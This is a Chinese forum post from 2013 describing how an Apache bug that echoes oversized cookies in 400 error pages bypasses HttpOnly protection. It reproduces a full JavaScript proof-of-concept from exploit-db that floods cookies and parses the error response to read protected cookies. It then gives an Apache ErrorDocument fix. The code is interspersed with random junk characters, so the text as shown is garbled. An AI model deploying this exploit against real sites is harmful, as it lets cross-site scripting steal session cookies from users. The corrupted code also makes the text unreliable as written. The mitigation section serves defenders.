很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。0 ^. @% ^6 Y8 e! j. ]
5 a- Q' w: y' h6 @# c8 }2 I2 \5 Z
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
U. ^; H# u, W$ i 0 ?; s G A5 [6 e" L6 f) |# ~
, d0 v* I+ ~4 G0 a// http://www.exploit-db.com/exploits/18442/$ F* \/ R1 w6 D' c4 I, V' a
function setCookies (good) {# z% P, Q8 q B
// Construct string for cookie value* O* `* o$ X h* f, G5 o; |8 i
var str = "";& B. @( D: O% \. |" M/ q
for (var i=0; i< 819; i++) { }6 Z' G* H( ]* d3 N4 l- j$ t2 _
str += "x";" K+ _8 {2 v) X; p
}
$ x. {1 F7 H4 ]# z& h6 T# }// Set cookies# e( W# O: E. G
for (i = 0; i < 10; i++) {/ T- l) h4 r. m/ Q$ \8 Y4 l7 H
// Expire evil cookie7 q8 w6 {: p! }, r' o4 M
if (good) {
+ M6 `+ ?3 S/ ^8 E& Pvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";! x2 Y/ W( o! @ _9 c
}
# X* M3 F" m7 D5 |3 }0 L% w7 ?// Set evil cookie
& o, O. o5 ~! x( m: _( delse {
9 f5 I( e$ D5 r dvar cookie = "xss"+i+"="+str+";path=/";4 D5 _" T2 _8 a
}
0 p5 p: b3 j' |2 ddocument.cookie = cookie;
0 I- z. l! m; j2 _& ~: ]}1 D% g/ q1 b ?! {
}
. l2 v" ]5 z+ k% w$ g5 U$ v( ]9 dfunction makeRequest() {
3 f7 V7 k7 L! T2 asetCookies();1 @9 [+ [/ T4 y
function parseCookies () {
* y; Z7 p( Z6 M. L+ L Evar cookie_dict = {};: r. \& |9 i' ?6 d) u4 h8 G
// Only react on 400 status
! `8 v1 |0 }9 T+ Uif (xhr.readyState === 4 && xhr.status === 400) {
# i O$ e4 m2 x" I9 q// Replace newlines and match <pre> content' q( @2 h& X. f) S( `# @
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
( P/ ^9 f& z0 O+ t+ Aif (content.length) {- C( r/ ?2 |0 o2 P. s3 f( `6 J- J
// Remove Cookie: prefix
- \; T- \: ~1 H# \+ _content = content[1].replace("Cookie: ", "");6 Q3 R4 \* A3 @7 \
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
" H/ c4 u! a& i) K+ r5 B1 a// Add cookies to object) ^2 l Q7 f( p5 E2 u
for (var i=0; i<cookies.length; i++) {
' `. }. q# _% C: e; m, evar s_c = cookies.split('=',2);( B3 F4 z. _/ N# b# B" W0 _
cookie_dict[s_c[0]] = s_c[1];1 l2 f9 K& C6 P
}8 V6 u; s2 o9 ~+ u
}1 Q0 }0 |" }. X5 L2 T6 G
// Unset malicious cookies
- [9 C5 `8 O9 `$ N" y vsetCookies(true);" S6 v' Y1 M4 H- g* _- m* Q
alert(JSON.stringify(cookie_dict));
' w. \' \+ Y! k$ E: t/ g7 l}
& o8 K: O3 f" X4 o9 |# H( J6 H$ z}) v) a( w$ r% {; Z0 @, t0 M. B
// Make XHR request4 L3 r$ ]) R2 Q4 I0 J3 c: T$ h
var xhr = new XMLHttpRequest();
6 m6 f h; u% ]! v" }; y) wxhr.onreadystatechange = parseCookies;
* G( S+ K# L+ Q5 y, b8 A5 yxhr.open("GET", "/", true);
& T/ G" X$ o; s" S# V; \& ixhr.send(null); b- U1 v- Y+ J' R# i, ^5 z$ ]. ?
}! T( I2 p) t; B4 h2 u7 W5 U
makeRequest();" c1 a- i' }3 i+ u" B; P
1 v$ r" M! b) O
你就能看见华丽丽的400错误包含着cookie信息。- H; Z, H N& d% H
9 ?& T$ [ N) L! F, V% z6 I
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#0 } j! C: R& Y$ c: ^3 {+ _
2 I% s2 M `7 K) I
修复方案:
. O' l3 L8 A: e/ u# p3 c7 P; f
- V. c; I; M7 ] e2 `6 fApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下4 c" z" q% X/ V( a& \$ V4 |) d
) k! F3 y, U) K5 z& JIn the event of a problem or error, Apachecan be configured to do one of four things,
1 w* q( M- q# b, K9 r$ M
" |3 U2 o5 W4 C+ w6 D- [8 J1. output asimple hardcoded error message输出一个简单生硬的错误代码信息0 H3 M) ]0 |$ G; R0 L8 M
2. output acustomized message输出一段信息
% @- ]' ]; p* b1 o3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
" v5 @. Y8 d/ y1 I4. redirect to an external URL to handle theproblem/error转向一个外部URL
9 r6 j+ D4 w* u( V, a, {
- Q( [( R: V. ?& L经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
9 W% \5 x: M7 r) G+ ?; s9 P$ F: B: k! S$ T9 J
Apache配置:
8 d! u+ d K% n% [; O/ d( j# \" p! E
ErrorDocument400 " security test"9 D& G; v/ c' d; L
- x& `: N# E6 T( g; X1 C当然,升级apache到最新也可:)。
+ Q! t% W3 C' H6 {5 _' ]! k/ x& I+ y. F* s m" e
参考:http://httpd.apache.org/security/vulnerabilities_22.html
; j/ C0 F& ?# Q2 x9 P+ H7 }3 z/ S3 j- l: Q, F
|
发表于 2013-4-19 19:15:43
收藏
支持
反对